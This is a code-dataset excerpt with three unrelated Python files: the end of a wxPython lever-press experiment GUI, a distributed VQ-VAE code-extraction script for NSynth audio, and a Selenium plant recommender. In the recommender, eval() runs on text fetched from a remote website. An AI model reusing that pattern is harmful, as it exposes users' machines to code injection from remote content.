valve3.Bind(wx.EVT_TOGGLEBUTTON,OnToggleValve)\n        valve4.Bind(wx.EVT_TOGGLEBUTTON,OnToggleValve)\n        valve5.Bind(wx.EVT_TOGGLEBUTTON,OnToggleValve)\n        valve6.Bind(wx.EVT_TOGGLEBUTTON,OnToggleValve)\n        valve7.Bind(wx.EVT_TOGGLEBUTTON,OnToggleValve)\n        valve8.Bind(wx.EVT_TOGGLEBUTTON,OnToggleValve)\n\n        self.deliverButton = wx.Button(self, label=\"Manual Taste\", pos = (60, 300) )\n\n        def helperDeliver(evt):\n            self.deliverManualTaste = 1\n            nP = self.numberPulses\n            pI = self.pulseInterval\n            rD = self.pulseDuration / 1000.0\n            #self.OnDeliver(evt, nP, pI, rD, 1)\n        \n        self.Bind(wx.EVT_BUTTON, helperDeliver, self.deliverButton)\n\n        self.pseudoLever = wx.Button(self,label=\"Lever Press\",pos=(60,270))\n        def OnPseudoLeverPress(event):\n            self.pseudoPress = True\n        self.Bind(wx.EVT_BUTTON, OnPseudoLeverPress, self.pseudoLever)\n\n        self.startButton = wx.Button(self, label = \"Start\", pos = (260,300) )\n        self.Bind (wx.EVT_BUTTON, self.OnStart, self.startButton)\n\n        self.stopButton = wx.Button(self, label = \"Stop\", pos = (260,360) )\n        self.Bind (wx.EVT_BUTTON, self.OnStop, self.stopButton)\n        \n        self.resetButton = wx.Button(self,label=\"Reset Counter\", 
pos=(300,710))\n self.Bind(wx.EVT_BUTTON, self.OnResetCounter, self.resetButton)\n\n \n # Text input\n\n self.rDuration = wx.StaticText(self, label=\"Pulse Duration (ms): \",pos=(20,340))\n self.wDuration = wx.TextCtrl(self, value=str(self.pulseDuration), pos=(115, 336), size=(40,-1))\n self.Bind(wx.EVT_TEXT, self.evtDuration, self.wDuration)\n \n self.rExperimentDur = wx.StaticText(self, label=\"Experiment Duration (s): \",pos=(220,130))\n self.wExperimentDur = wx.TextCtrl(self, value=str(self.experimentDuration), pos=(345, 130), size=(35,-1))\n self.Bind(wx.EVT_TEXT, self.evtExperimentDur, self.wExperimentDur)\n \n self.rRewardInt = wx.StaticText(self, label=\"Reward Interval (s): \",pos=(220,160))\n self.wRewardInt = wx.TextCtrl(self, value=str(self.rewardInterval), pos=(345, 160), size=(35,-1))\n self.Bind(wx.EVT_TEXT, self.evtRewardInt, self.wRewardInt)\n\n self.rRewardDur = wx.StaticText(self, label=\"Reward Duration (s): \",pos=(220,190))\n self.wRewardDur = wx.TextCtrl(self, value=str(self.rewardDuration), pos=(345, 190), size=(45,-1))\n self.Bind(wx.EVT_TEXT, self.evtRewardDur, self.wRewardDur)\n\n self.rITI = wx.StaticText(self, label =\" Inter Trial Interval (s):\", pos=(220,50))\n self.wITI = wx.TextCtrl(self, value =str(self.iti), pos=(365, 45), size=(35,-1))\n self.Bind(wx.EVT_TEXT, self.evtITI, self.wITI)\n\n self.rWait = wx.StaticText(self, label=\" Wait Interval (s):\", pos=(220,100))\n self.wWait = wx.TextCtrl(self, value=str(self.wait), pos=(365,95), size=(35,-1))\n self.Bind(wx.EVT_TEXT, self.evtWait, self.wWait)\n\n self.rToneDur = wx.StaticText(self, label=\" Tone Duration (s):\", pos=(20,160))\n self.wToneDur = wx.TextCtrl(self, value=str(self.toneDuration), pos=(120, 155), size=(40,-1))\n self.Bind(wx.EVT_TEXT, self.evtToneDur, self.wToneDur)\n\n self.rExperimentTime = wx.StaticText(self, label=\" Experiment Time \", pos=(50,650))\n self.wExperimentTime = wx.StaticText(self, label=\"0\", pos=(160, 648))\n\n self.rNumRewards = wx.StaticText(self, label=\" # of Rewards \", pos=(300,650))\n self.wNumRewards = wx.StaticText(self, label=\"0\", pos=(400, 650))\n\n self.rManTaste = wx.StaticText(self,label=\" # of Manual Tastes \", pos=(300,680))\n self.wManTaste = wx.StaticText(self, label=\"0\", pos=(400, 680))\n\n self.rTimeTone = wx.StaticText(self, label=\" Time from Tone \", pos=(50,710))\n self.wTimeTone = wx.StaticText(self, label=\"0\", pos=(160, 708)) \n\n self.Bind(wx.EVT_SET_FOCUS, self.OnSetFocus)\n self.Bind(wx.EVT_KILL_FOCUS, self.OnKillFocus)\n\n def setSibling(self,graph):\n self.graphPanel = graph\n \n def OnDeliver(self,event, nP, pI, rD, mode):\n self.deliverButton.Disable()\n self.deliveryT = DeliveryThread(nP,pI,rD, mode)\n\n def OnResetCounter(self,evt):\n self.wNumRewards.SetLabel(\"0\")\n self.numberOfRewards=0\n self.wManTaste.SetLabel(\"0\")\n self.numberOfMT=0\n \n \n# IMP Note: Digital Inputs are normally pulled high\n# IMP Note: 'Normal Close' for Lever Input\n\n def OnStop(self, event):\n self.worker.stop()\n self.startButton.Enable()\n writeToFile()\n\n def OnStart(self, event):\n #if len(self.timeStamps)>0:\n # clearGraph()\n # self.timeStamps = []\n clearGraph()\n if Frame.Panel1.numValves == 0:\n Frame.Panel1.logger.AppendText(\"Error: no valve selected.\\n\")\n return\n self.worker = MainThread()\n #Disable any widgets which could affect your thread\n self.startButton.Disable()\n \n def evtDuration(self, event):\n try:\n self.pulseDuration = int(event.GetString())\n except ValueError:\n pass\n \n def evtWait(self, event):\n try:\n 
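# parse the text field as a float; incomplete input raises ValueError and is silently ignored\n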
self.wait = float(event.GetString())\n except ValueError:\n pass\n\n def evtExperimentDur(self, event):\n try:\n self.experimentDuration = float(event.GetString())\n except ValueError:\n pass\n\n def evtRewardInt(self, event):\n try:\n self.rewardInterval = float(event.GetString())\n except ValueError:\n pass\n\n def evtRewardDur(self, event):\n try:\n self.rewardDuration = float(event.GetString())\n except ValueError:\n pass\n\n def evtITI(self, event):\n try:\n self.iti = float(event.GetString())\n except ValueError:\n pass\n\n def evtToneDur(self, event):\n try:\n self.toneDuration= float(event.GetString())\n except ValueError:\n pass\n\n def OnSetFocus(self, event):\n self.color = '#0099f7'\n self.Refresh()\n\n def OnKillFocus(self, event):\n self.color = '#b3b3b3'\n self.Refresh()\n\nclass MyFrame(wx.Frame):\n def __init__(self, parent, id, title):\n wx.Frame.__init__(self, parent, id, title, size=(1000, 800))\n grid = wx.GridSizer(1, 2, 10, 10)\n self.Panel1 = MainPanel(self)\n self.Panel2 = GraphPanel(self,self.Panel1)\n self.Panel1.setSibling(self.Panel2)\n grid.AddMany([(self.Panel1, 1, wx.EXPAND|wx.TOP|wx.LEFT,9), (self.Panel2, 1, wx.EXPAND|wx.TOP|wx.RIGHT, 9)])\n\n self.SetSizer(grid)\n self.Centre()\n self.Show(True)\n\ndef plotGraph(event):\n Frame.Panel2.OnPaint(event)\n\ndef clearGraph():\n Frame.Panel2.clearGraph()\n \n#def test():\n\n \ndef writeToFile():\n \n currDir = os.getcwd()\n dirs = currDir.split('\\\\')\n dirs.pop()\n currDir = '\\\\'.join(dirs)\n directory = currDir+'\\\\Time Stamps\\\\'\n fileName = directory + datetime.now().strftime(\"%Y.%B.%d, %H.%M.%S\") + '.txt'\n f = open(fileName, 'w')\n temp = Frame.Panel1.timeStamps\n for i in range( len(temp) ):\n tempString = str(temp[i][1])+ '\\t' + str(temp[i][0]) + '\\n'\n f.write(tempString)\n f.close()\n directory = currDir+'\\\\ExpParams\\\\'\n fileName = directory + datetime.now().strftime(\"%Y.%B.%d, %H.%M.%S\") + '.txt'\n f = open(fileName,'w')\n f.write(\"Experiment Duration = \\t\"+str(Frame.Panel1.experimentDuration)+\"\\n\\n\")\n f.write(\"Inter Trial Interval = \\t\"+str(Frame.Panel1.iti)+\"\\n\")\n f.write(\"Wait Interval = \\t\"+str(Frame.Panel1.wait)+\"\\n\")\n f.write(\"Reward Interval = \\t\"+str(Frame.Panel1.rewardInterval)+\"\\n\")\n f.write(\"Reward Duration = \\t\"+str(Frame.Panel1.rewardDuration)+\"\\n\")\n f.write(\"Rewarded Lever Presses = \\t\"+str(Frame.Panel1.numberOfRewards)+\"\\n\")\n f.close()\n Frame.Panel1.logger.AppendText(\"Writing to File Completed.\\n\")\n Frame.Panel1.timeStamps = []\n \napp = wx.App(False) # Create a new app, don't redirect stdout/stderr to a window. 
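\n# Each completed run calls writeToFile() above, which saves the tab-separated event\n# timestamps into the Time Stamps folder and the run settings into the ExpParams folder.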
\nFrame = MyFrame(None, -1, frameName)\napp.MainLoop()\n\n\n\n\n","sub_path":"ExpSuite - Copy/ExpSuite/TMP/historic_files/LeverPress_AWv1.3.py","file_name":"LeverPress_AWv1.3.py","file_ext":"py","file_size_in_byte":25038,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"503988036","text":"from typing import Any, Mapping, Optional\r\nimport argparse\r\nimport pickle\r\nimport json\r\nimport pathlib\r\nimport os\r\n\r\nimport torchvision\r\nimport soundfile\r\nimport numpy as np\r\nfrom sklearn.preprocessing import LabelEncoder\r\n\r\nimport torch\r\nimport torch.distributed as dist\r\nfrom torch import nn\r\nfrom torch.utils.data import DataLoader, DistributedSampler\r\nfrom torch.nn.parallel import DistributedDataParallel as DDP\r\nimport lmdb\r\nfrom tqdm import tqdm\r\n\r\nfrom pytorch_nsynth import NSynth\r\nfrom GANsynth_pytorch.loader import (WavToSpectrogramDataLoader,\r\n make_masked_phase_transform)\r\n\r\nfrom interactive_spectrogram_inpainting.vqvae import encoder_decoder\r\nfrom interactive_spectrogram_inpainting.utils.datasets.lmdb_dataset import (\r\n CodeRow, LMDBDataset)\r\nfrom interactive_spectrogram_inpainting.vqvae.vqvae import (\r\n VQVAE)\r\nfrom interactive_spectrogram_inpainting.utils.datasets.label_encoders import (\r\n dump_label_encoders)\r\nfrom interactive_spectrogram_inpainting.utils.misc import (\r\n expand_path, get_spectrograms_helper)\r\nfrom interactive_spectrogram_inpainting.utils.distributed import (\r\n is_master_process)\r\n\r\n# HOP_LENGTH = 512\r\n# N_FFT = 2048\r\n# FS_HZ = 16000\r\n\r\n\r\ndef extract(lmdb_env, loader: WavToSpectrogramDataLoader,\r\n model: DDP,\r\n device: str,\r\n label_encoders: Mapping[str, LabelEncoder] = {},\r\n ):\r\n codes_db = lmdb_env.open_db(\r\n 'codes'.encode('utf-8'),\r\n dupsort=False # skip duplicate keys\r\n )\r\n\r\n if is_master_process():\r\n with lmdb_env.begin(write=True) as txn:\r\n # store the label encoders along with the database\r\n # this allows for future conversions\r\n txn.put('label_encoders'.encode('utf-8'), pickle.dumps(\r\n label_encoders))\r\n\r\n attribute_names = label_encoders.keys()\r\n\r\n pbar_loader = tqdm(loader)\r\n for (sample_batch, *categorical_attributes_batch,\r\n attributes_batch) in pbar_loader:\r\n sample_batch = sample_batch.to(device)\r\n sample_names = attributes_batch['note_str']\r\n\r\n *_, id_t, id_b = model(sample_batch)\r\n id_t = id_t.detach().cpu().numpy()\r\n id_b = id_b.detach().cpu().numpy()\r\n\r\n for top, bottom, *attributes, sample_name in zip(\r\n id_t, id_b, *categorical_attributes_batch, sample_names):\r\n row = CodeRow(top=top, bottom=bottom,\r\n attributes=dict(zip(attribute_names,\r\n attributes)),\r\n filename=sample_name)\r\n # starting LMDB transaction here to avoid deadlocks on distributed access\r\n with lmdb_env.begin(db=codes_db, write=True) as txn:\r\n txn.put(sample_name.encode('utf-8'), pickle.dumps(row))\r\n # pbar_loader.set_description(f'inserted: {index}')\r\n\r\n # txn.put('length'.encode('utf-8'), str(index).encode('utf-8'))\r\n\r\n\r\nif __name__ == '__main__':\r\n # These are the parameters used to initialize the process group\r\n env_dict = {\r\n key: os.environ[key]\r\n for key in (\"MASTER_ADDR\", \"MASTER_PORT\", \"RANK\", \"WORLD_SIZE\")\r\n }\r\n print(f\"[{os.getpid()}] Initializing process group with: {env_dict}\")\r\n dist.init_process_group(backend=\"nccl\")\r\n\r\n class StoreDictKeyPair(argparse.Action):\r\n def __call__(self, parser, namespace, values, 
option_string=None):\r\n            my_dict = {}\r\n            for kv in values.split(\",\"):\r\n                k, v = kv.split(\"=\")\r\n                my_dict[str(k)] = str(v)\r\n            setattr(namespace, self.dest, my_dict)\r\n\r\n    parser = argparse.ArgumentParser()\r\n    parser.add_argument('--main_output_dir', type=str, required=True)\r\n    parser.add_argument('--categorical_fields', type=str, nargs='*',\r\n                        default=['instrument_family_str', 'pitch'])\r\n    parser.add_argument('--batch_size', type=int, default=64)\r\n    parser.add_argument('--num_workers', type=int, default=4,\r\n                        help='Number of worker processes for the Dataloaders')\r\n    parser.add_argument('--dataset_audio_directory_paths', type=str,\r\n                        nargs='+')\r\n    parser.add_argument('--named_dataset_json_data_paths',\r\n                        action=StoreDictKeyPair)\r\n    parser.add_argument('--vqvae_weights_path', type=str, required=True)\r\n    parser.add_argument('--vqvae_model_parameters_path', type=str,\r\n                        required=True)\r\n    parser.add_argument('--vqvae_training_parameters_path', type=str,\r\n                        required=True)\r\n    parser.add_argument('--size', type=int)\r\n    parser.add_argument('--overwrite_existing_dump', action='store_true')\r\n    parser.add_argument('--disable_database_creation', action='store_true')\r\n\r\n    # DistributedDataParallel arguments\r\n    parser.add_argument(\r\n        '--local_rank', type=int, default=0,\r\n        help=\"This is provided by torch.distributed.launch\")\r\n    parser.add_argument(\r\n        '--local_world_size', type=int, default=1,\r\n        help=\"Number of GPUs per node, required by torch.distributed.launch\")\r\n\r\n    args = parser.parse_args()\r\n\r\n    MAIN_DIR = pathlib.Path(args.main_output_dir)\r\n\r\n    VQVAE_WEIGHTS_PATH = expand_path(args.vqvae_weights_path)\r\n    VQVAE_MODEL_PARAMETERS_PATH = expand_path(args.vqvae_model_parameters_path)\r\n    VQVAE_TRAINING_PARAMETERS_PATH = expand_path(\r\n        args.vqvae_training_parameters_path)\r\n    assert (VQVAE_WEIGHTS_PATH.is_file()\r\n            and VQVAE_MODEL_PARAMETERS_PATH.is_file()\r\n            and VQVAE_TRAINING_PARAMETERS_PATH.is_file())\r\n    # folder containing the vqvae weights is the ID\r\n    vqvae_id = VQVAE_WEIGHTS_PATH.parts[-2]\r\n    vqvae_model_filename = VQVAE_WEIGHTS_PATH.stem\r\n\r\n    OUTPUT_DIR = MAIN_DIR / f'vqvae-{vqvae_id}-weights-{vqvae_model_filename}/'\r\n\r\n    if not args.disable_database_creation and is_master_process():\r\n        os.makedirs(OUTPUT_DIR, exist_ok=True)\r\n\r\n    device = f'cuda:{args.local_rank}' if torch.cuda.is_available() else 'cpu'\r\n\r\n    audio_directory_paths = [expand_path(path)\r\n                             for path in args.dataset_audio_directory_paths]\r\n\r\n    named_dataset_json_data_paths = {\r\n        dataset_name: expand_path(json_data_path)\r\n        for dataset_name, json_data_path\r\n        in args.named_dataset_json_data_paths.items()\r\n    }\r\n\r\n    assert (len(set(named_dataset_json_data_paths.keys()))\r\n            == len(named_dataset_json_data_paths.keys())), (\r\n        \"Use unique names for all datasets, \"\r\n        \"otherwise the outputs will overwrite one another\"\r\n    )\r\n\r\n    # retrieve n_fft, hop length, window length parameters...\r\n    with open(VQVAE_TRAINING_PARAMETERS_PATH, 'r') as f:\r\n        vqvae_training_parameters = json.load(f)\r\n    with open(VQVAE_MODEL_PARAMETERS_PATH, 'r') as f:\r\n        vqvae_model_parameters = json.load(f)\r\n    spectrograms_helper = get_spectrograms_helper(**vqvae_training_parameters)\r\n    spectrograms_helper.to(device)\r\n\r\n    for dataset_name, json_data_path in named_dataset_json_data_paths.items():\r\n        assert json_data_path.is_file()\r\n        valid_pitch_range = vqvae_training_parameters['valid_pitch_range']\r\n        transform: Optional[torchvision.transforms.Lambda] = None\r\n        if 
vqvae_model_parameters['output_spectrogram_min_magnitude'] is not None:\r\n transform = make_masked_phase_transform(\r\n vqvae_model_parameters['output_spectrogram_min_magnitude'])\r\n\r\n print(\"loading dataset\", dataset_name)\r\n nsynth_dataset_with_samples_names = NSynth(\r\n audio_directory_paths=audio_directory_paths,\r\n json_data_path=json_data_path,\r\n valid_pitch_range=valid_pitch_range,\r\n categorical_field_list=args.categorical_fields,\r\n squeeze_mono_channel=True,\r\n return_full_metadata=True,\r\n remove_qualities_str_from_full_metadata=True,\r\n )\r\n\r\n print(\"instantiating wav-to-spectrogram dataloader\", dataset_name)\r\n # converts wavforms to spectrograms on-the-fly on GPU\r\n distributed_sampler = DistributedSampler(\r\n nsynth_dataset_with_samples_names,\r\n shuffle=False)\r\n loader = WavToSpectrogramDataLoader(\r\n nsynth_dataset_with_samples_names,\r\n sampler=distributed_sampler,\r\n spectrograms_helper=spectrograms_helper,\r\n batch_size=args.batch_size,\r\n num_workers=args.num_workers, shuffle=False,\r\n transform=transform,\r\n )\r\n batch_size, in_channel, image_height, image_width = next(iter(loader))[0].shape\r\n image_size = image_height, image_width\r\n print(\"image_size:\", image_size)\r\n\r\n label_encoders = nsynth_dataset_with_samples_names.label_encoders\r\n\r\n encoders: Optional[Mapping[str, Any]] = None\r\n decoders: Optional[Mapping[str, Any]] = None\r\n if vqvae_training_parameters['use_resnet']:\r\n encoders, decoders = encoder_decoder.xresnet_unet_from_json_parameters(\r\n in_channel,\r\n image_size,\r\n VQVAE_TRAINING_PARAMETERS_PATH\r\n )\r\n\r\n vqvae = VQVAE.from_parameters_and_weights(\r\n VQVAE_MODEL_PARAMETERS_PATH,\r\n VQVAE_WEIGHTS_PATH,\r\n encoders=encoders,\r\n decoders=decoders)\r\n\r\n model = vqvae.to(device)\r\n model = nn.SyncBatchNorm.convert_sync_batchnorm(model)\r\n model = DDP(\r\n module=model,\r\n device_ids=[args.local_rank],\r\n output_device=args.local_rank,\r\n find_unused_parameters=True\r\n )\r\n\r\n model.eval()\r\n\r\n # TODO(theis): compute appropriate size for the map,\r\n # for now it's a generous overshoot\r\n map_size = 100 * 1024 * 1024 * 1024\r\n\r\n lmdb_path = expand_path(OUTPUT_DIR / dataset_name)\r\n\r\n if not args.disable_database_creation:\r\n if is_master_process():\r\n os.makedirs(lmdb_path, exist_ok=args.overwrite_existing_dump)\r\n # store command-line parameters\r\n with open(OUTPUT_DIR / 'command_line_parameters.json', 'w') as f:\r\n json.dump(args.__dict__, f, indent=4)\r\n\r\n dump_label_encoders(\r\n nsynth_dataset_with_samples_names.label_encoders,\r\n lmdb_path)\r\n\r\n env = lmdb.open(\r\n str(lmdb_path),\r\n map_size=map_size,\r\n max_dbs=2,\r\n )\r\n with torch.no_grad():\r\n print(\"Start extraction for dataset\", dataset_name)\r\n extract(env, loader, model,\r\n device,\r\n label_encoders=label_encoders)\r\n\r\n print(\"Start sanity-check for dataset\", dataset_name)\r\n # check extracted codes by saving to disk the audio for a batch\r\n # of re-synthesized codemaps\r\n codes_dataset = LMDBDataset(\r\n lmdb_path,\r\n classes_for_conditioning=args.categorical_fields,\r\n dataset_db_name='codes')\r\n\r\n codes_loader = DataLoader(codes_dataset, batch_size=8,\r\n shuffle=True)\r\n\r\n if is_master_process():\r\n with torch.no_grad():\r\n codes_top_sample, codes_bottom_sample, attributes = (\r\n next(iter(codes_loader)))\r\n decoded_sample = model.module.decode_code(\r\n codes_top_sample.to(device),\r\n codes_bottom_sample.to(device))\r\n\r\n def make_audio(mag_and_IF_batch: 
torch.Tensor) -> np.ndarray:\r\n                    audio_batch = spectrograms_helper.to_audio(\r\n                        mag_and_IF_batch)\r\n                    audio_mono_concatenated = (audio_batch\r\n                                               .flatten().cpu().numpy())\r\n                    return audio_mono_concatenated\r\n\r\n                audio_sample_path = os.path.join(\r\n                    lmdb_path,\r\n                    'vqvae_codes_extraction_samples.wav')\r\n                soundfile.write(audio_sample_path,\r\n                                make_audio(decoded_sample),\r\n                                samplerate=vqvae_training_parameters['fs_hz'])\r\n                print(\"Stored sanity-check decoding of stored codes at\",\r\n                      audio_sample_path)\r\n","sub_path":"extract_code.py","file_name":"extract_code.py","file_ext":"py","file_size_in_byte":12469,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"}
+{"seq_id":"524481965","text":"import pandas as pd \r\nimport re\r\nimport numpy as np\r\nimport random\r\nimport selenium\r\nfrom selenium.webdriver import Firefox\r\nfrom selenium.webdriver.firefox.options import Options\r\nfrom selenium.webdriver.support.ui import Select\r\nfrom selenium.webdriver.support.ui import WebDriverWait\r\nfrom selenium.webdriver.support import expected_conditions as EC\r\nfrom selenium.webdriver.common.by import By\r\nfrom collections import defaultdict\r\n\r\nclass PlantRecommender:\r\n    \"\"\"A recommender for designing plant guilds and permaculture gardens.\r\n    Uses a REST API for the USDA Plants Database \r\n    (https://github.com/sckott/usdaplantsapi/) and the National Gardening \r\n    Association's plant database (https://garden.org) to recommend plants for \r\n    various uses.\r\n\r\n    Parameters\r\n    ----------\r\n    soil_texture: string, default='medium'\r\n        Values can be {'coarse', 'medium', 'fine'}, or from the Soil Texture \r\n        Triangle, {'sand', 'coarse_sand', 'fine_sand', 'loamy_coarse_sand', \r\n        'loamy_fine_sand', 'loamy_very_fine_sand', 'very_fine_sand', \r\n        'loamy_sand', 'silt', 'sandy_clay_loam', 'very_fine_sandy_loam', \r\n        'silty_clay_loam', 'silt_loam', 'loam', 'fine_sandy_loam', 'sandy_loam', \r\n        'coarse_sandy_loam', 'clay_loam', 'sandy_clay', 'silty_clay', 'clay'}.\r\n    \r\n    ph: float, default=6.5\r\n        Soil pH can range from 3.5-9.0. Most plants thrive in soil between 6-7.\r\n\r\n    moisture: {'high', 'medium', 'low'}, default='medium'\r\n        How much moisture is available.\r\n\r\n    zone: int, default=7\r\n
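USDA hardiness zone, from 1 (coldest) to 10 (warmest).\r\n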
Mapped to min_temp because the USDA database uses \r\n        minimum temperature, but hardiness zone is more commonly used.\r\n\r\n    region: {'northeast', 'southeast', 'midwest', 'plains', 'pacific'}, default=None\r\n        Set to find plants that are native to a specific region.\r\n\r\n    state: two-letter state abbreviations, default=None\r\n        Set to find plants that are native to a specific state.\r\n    \"\"\"\r\n\r\n    def __init__(self, soil_texture='medium', ph=6.5, moisture='medium', \r\n                 zone=7, region=None, state=None): \r\n        # site parameters \r\n        if soil_texture in {'coarse', 'sand', 'coarse_sand', 'fine_sand', \r\n                            'loamy_coarse_sand', 'loamy_fine_sand', \r\n                            'loamy_very_fine_sand', 'very_fine_sand', \r\n                            'loamy_sand'}:\r\n            self.soil_texture = {'Adapted_to_Coarse_Textured_Soils': 'Yes'}\r\n        elif soil_texture in {'medium', 'silt', 'sandy_clay_loam', \r\n                              'very_fine_sandy_loam', 'silty_clay_loam', \r\n                              'silt_loam', 'loam', 'fine_sandy_loam', 'sandy_loam', \r\n                              'coarse_sandy_loam', 'clay_loam'}:\r\n            self.soil_texture = {'Adapted_to_Medium_Textured_Soils': 'Yes'}\r\n        elif soil_texture in {'fine', 'sandy_clay', 'silty_clay', 'clay'}:\r\n            self.soil_texture = {'Adapted_to_Fine_Textured_Soils': 'Yes'}\r\n        else:\r\n            self.soil_texture = None\r\n        self.ph = ph\r\n        self.moisture = moisture\r\n        hardiness_zone_to_temp = {1:-60, 2:-50, 3:-40, 4:-30, 5:-20, 6:-10, 7:0,\r\n                                  8:10, 9:20, 10:30}\r\n        if zone is not None:\r\n            self.min_temp = hardiness_zone_to_temp[zone]\r\n        else:\r\n            self.min_temp = None\r\n        if region is not None:\r\n            regions = {'northeast': ['ME', 'NH', 'VT', 'MA', 'RI', 'CT', 'NY', \r\n                                     'NJ', 'PA', 'DE', 'MD', 'WV', 'VA'], \r\n                       'southeast': ['NC', 'TN', 'AR', 'SC', 'GA', 'AL', 'MS', \r\n                                     'LA', 'FL'], \r\n                       'midwest': ['MN', 'WI', 'MI', 'IA', 'IL', 'IN', 'OH', \r\n                                   'MO', 'KY'],\r\n                       'plains': ['MT', 'ND', 'WY', 'SD', 'NE', 'CO', 'KS', \r\n                                  'NM', 'TX', 'OK'],\r\n                       'pacific': ['WA', 'OR', 'ID', 'CA', 'NV', 'UT', 'AZ']}\r\n            self.region = regions[region]\r\n        else:\r\n            self.region = region\r\n        self.state = state \r\n        self.categorical_attributes = ['Genus', 'Species', 'Varieties']\r\n        self.boolean_attributes = ['Coarse Soil', 'Medium Soil', 'Fine Soil']\r\n        self.numeric_attributes = []\r\n\r\n        options = Options()\r\n        options.headless = True\r\n        self.driver = Firefox(options=options)\r\n        self.usda_url = 'https://plantsdb.xyz/search'\r\n        self.garden_search_url = 'https://garden.org/plants/search/advanced.php'\r\n        self.driver.get(self.garden_search_url)\r\n        # garden.org search parameters\r\n        self.sections = [s for s in self.driver.find_elements_by_xpath('//p') if\r\n                         s.text != '']\r\n        self.plant_habit = self.get_inputs(self.sections[0])\r\n        self.life_cycle = Select(self.sections[1].find_element_by_xpath(\r\n            './/select'))\r\n        self.categorical_attributes.append('Life cycle')\r\n        self.light = self.get_inputs(self.sections[2])\r\n        self.water = self.get_inputs(self.sections[3])\r\n        self.soil_ph = self.get_inputs(self.sections[4])\r\n        self.cold_hardiness = Select(self.sections[5].find_element_by_xpath(\r\n            './/select'))\r\n        self.numeric_attributes.append('Minimum cold hardiness')\r\n        self.maximum_zone = Select(self.sections[6].find_element_by_xpath(\r\n            './/select'))\r\n        self.numeric_attributes.append('Maximum recommended zone')\r\n        self.plant_height = self.sections[7].find_element_by_xpath('.//input')\r\n        self.numeric_attributes.append('Plant Height')\r\n        self.plant_spread = self.sections[8].find_element_by_xpath('.//input')\r\n        self.numeric_attributes.append('Plant Spread')\r\n        self.leaves = self.get_inputs(self.sections[9], 'Leaves_')\r\n        self.fruit = self.get_inputs(self.sections[10], 'Fruit_')\r\n        self.fruiting_time = self.get_inputs(self.sections[11], \r\n                                             'Fruiting 
Time_')\n self.flowers = self.get_inputs(self.sections[12], 'Flowers_')\n self.flower_color = self.get_inputs(self.sections[13],)\n self.bloom_size = self.get_inputs(self.sections[14])\n self.flower_time = self.get_inputs(self.sections[15], 'Flower Time_')\n self.inflorescence_height = self.sections[16].find_element_by_xpath(\n './/input')\n self.numeric_attributes.append('Inflorescence Height')\n self.foliage_mound_height = self.sections[17].find_element_by_xpath(\n './/input')\n self.numeric_attributes.append('Foliage Mound Height')\n self.roots = self.get_inputs(self.sections[18])\n self.locations = self.get_inputs(self.sections[19])\n self.uses = self.get_inputs(self.sections[20])\n self.edible_parts = self.get_inputs(self.sections[21])\n self.eating_methods = self.get_inputs(self.sections[22])\n self.dynamic_accumulator = self.get_inputs(self.sections[23])\n self.wildlife_attract = self.get_inputs(self.sections[24])\n self.resistances = self.get_inputs(self.sections[25])\n self.toxicity = self.get_inputs(self.sections[26])\n # some of these have additional inputs once selected.\n # not implemented yet.\n self.propagation_seed = self.get_inputs(self.sections[27])\n self.propagation_other = self.get_inputs(self.sections[28])\n self.pollinators = self.get_inputs(self.sections[29])\n self.containers = self.get_inputs(self.sections[30])\n self.misc = self.get_inputs(self.sections[31])\n self.awards = self.get_inputs(self.sections[32])\n self.conservation_status = Select(self.sections[33].\n find_element_by_xpath('.//select'))\n self.parentage = self.sections[34].find_element_by_xpath('.//input')\n self.child_plants = self.sections[35].find_element_by_xpath('.//input')\n self.sort_by = Select(self.sections[36].find_element_by_xpath(\n './/select'))\n self.clear_form = self.sections[37].find_element_by_xpath('.//a')\n\n def get_inputs(self, section, field=''):\n inputs = section.find_elements_by_xpath('.//input')\n labels = section.find_elements_by_xpath('.//label')\n self.boolean_attributes += [field+l.text for l in labels]\n return {l.text: i for l,i in zip(labels,inputs)}\n\n def get_results(self):\n \"\"\"Return a dict with the scientific name of each plant returned by a \n query and a list of links to all varieties of that plant.\n Note: self.driver must be on a garden.org results page before calling.\n \"\"\"\n links = self.driver.find_elements_by_xpath('.//a')\n results = defaultdict(list)\n for l in links:\n url = l.get_attribute('href')\n name = re.findall(r'(?<=\\()([A-Z]\\w+ [a-z]\\w+)', l.text)\n if 'plants/view/' in url and len(name) > 0:\n results[name[0]].append(url)\n return results\n\n \n def filter_plants(self, results):\n \"\"\"Cross-reference plants returned from a garden.org query with the USDA\n plants database to remove plants that do not meet requirements and \n return filtered results.\n \"\"\"\n print('Finding native plants', end='')\n plants = pd.DataFrame()\n for name in results.keys():\n print('.', end='')\n plant = {a:None for a in (self.categorical_attributes\n + self.boolean_attributes\n + self.numeric_attributes)}\n genus,species = name.split()\n self.driver.get(f'{self.usda_url}?Genus={genus}&Species={species}')\n self.driver.implicitly_wait(5)\n self.driver.find_element_by_id('rawdata-tab').click()\n data = self.driver.find_element_by_class_name('data')\n try:\n data = eval(data.text.replace('null', 'None'))['data'][0]\n is_native = ('L48 (N)' in data['Native_Status'])\n states = data['State_and_Province']\n states = 
states[states.index('(')+1:states.index(')')] \r\n                in_location = ((self.state is None and self.region is None) or \r\n                               (self.state in states) or \r\n                               (len(set(self.region) & set(states)) > 0))\r\n                in_zone = self.min_temp >= eval(data['Temperature_Minimum_F'])\r\n                in_ph_range = ((self.ph >= eval(data['pH_Minimum'])) and \r\n                               (self.ph <= eval(data['pH_Maximum'])))\r\n            except:\r\n                continue\r\n            if is_native and in_location and in_zone and in_ph_range:\r\n                plant['Genus'] = genus\r\n                plant['Species'] = species\r\n                plant['Varieties'] = results[name]\r\n                plant['Coarse Soil'] = data['Adapted_to_Coarse_Textured_Soils']=='Yes'\r\n                plant['Medium Soil'] = data['Adapted_to_Medium_Textured_Soils']=='Yes'\r\n                plant['Fine Soil'] = data['Adapted_to_Fine_Textured_Soils']=='Yes' \r\n                self.driver.get(results[name][0])\r\n                table = self.driver.find_element_by_xpath('//caption[contains('\r\n                    'text(),\"General Plant Information\")]/../tbody')\r\n                rows = table.find_elements_by_xpath('.//tr')\r\n                for row in rows:\r\n                    field,values = row.find_elements_by_xpath('.//td')\r\n                    field = field.text[:-1]\r\n                    values = values.text.split('\\n')\r\n                    if (field in self.categorical_attributes \r\n                        + self.numeric_attributes):\r\n                        plant[field] = values[0]\r\n                    else:\r\n                        for v in values:\r\n                            if f'{field}_{v}' in self.boolean_attributes:\r\n                                plant[f'{field}_{v}'] = True \r\n                            elif v in self.boolean_attributes:\r\n                                plant[v] = 